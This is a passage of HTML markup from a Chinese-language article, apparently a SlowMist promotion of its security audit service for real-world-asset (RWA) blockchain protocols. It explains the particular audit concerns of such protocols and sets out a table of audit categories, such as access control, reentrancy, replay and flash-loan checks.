SPV、托管人、发行人、清算人等链下角色，以及法律、合同和监管框架。审计不能只看代码是否有 bug，还需要关注&#34;代码行为是否与项目声称的权利结构一致&#34;。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">第二，权限与角色更加密集和敏感。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">RWA 协议中的角色分工对应现实世界：发行人、资产管理人、托管机构、合规服务商、清算人等，在合约中形成复杂的权限层级。一个角色的权限边界，直接影响真实世界的资产归属，审计需要对每一个高危函数和权限路径进行完整梳理与风险定性。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">第三，业务流程穿插链上与链下。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">典型的 RWA 操作路径是：用户在链上调用 → 合约更新状态并记录事件 → 链下系统执行真实资产交割、过户或清算。链上代码与链下业务执行的一致性，成为 RWA 审计不可绕过的核心命题。</span></span></p><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;color: rgb(0, 0, 0);font-weight: bold;">慢雾 RWA 安全审计方案</span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">慢雾安全团队基于对主流 RWA 协议族的深度解构，结合多年区块链安全实战经验，推出了一套系统化的 RWA 安全审计服务，覆盖以下核心维度：</span></span></p><b style="font-weight:normal;" data-pm-slice="0 0 []"><table style="border:none;border-collapse:collapse;"><tbody><tr style="height:27.337579617834397pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;background-color:#eeeeee;padding:5pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">序号 (NO.)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;background-color:#eeeeee;padding:5pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">审计大类 (Audit Class)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;background-color:#eeeeee;padding:5pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">审计子类 (Audit Subclass)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td rowspan="10" style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">1</span></span></p></td><td rowspan="10" style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">功能合规性审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Functionality Compliance Audit)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">基础功能完备性审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Basic Functionality Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">全局暂停/恢复功能审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Global Pause/Resume Functionality Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">受控铸造/销毁功能审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Controlled Mint/Burn Functionality)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">账户级冻结功能审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Account-Level Freeze Functionality Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">强制转移/没收功能审计</span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""> (Forced Transfer/Wipe Functionality Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">黑名单管理功能审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Blacklist Management Functionality Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">白名单/身份注册表管理审计</span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""> (Whitelist/Identity Registry Management Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">分区/份额管理逻辑审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Partition/Tranche Logic Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">文档/元数据锚定审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Document/Metadata Anchoring Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">可升级性功能审计</span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""> (Upgradability Functionality Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td rowspan="2" style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">2</span></span></p></td><td rowspan="2" style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">访问控制体系审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Access Control System)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">基于角色的权限控制审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Role-Based Access Control Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">多重签名机制审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Multi-signature Mechanism Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">3</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">溢出漏洞审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Overflow Audit)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">-</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">4</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">重入攻击审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Reentrancy Attack Audit)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">-</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">5</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">重放攻击审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Replay Attack Audit)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">-</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">6</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">闪电贷攻击审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Flashloan Attack Audit)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: 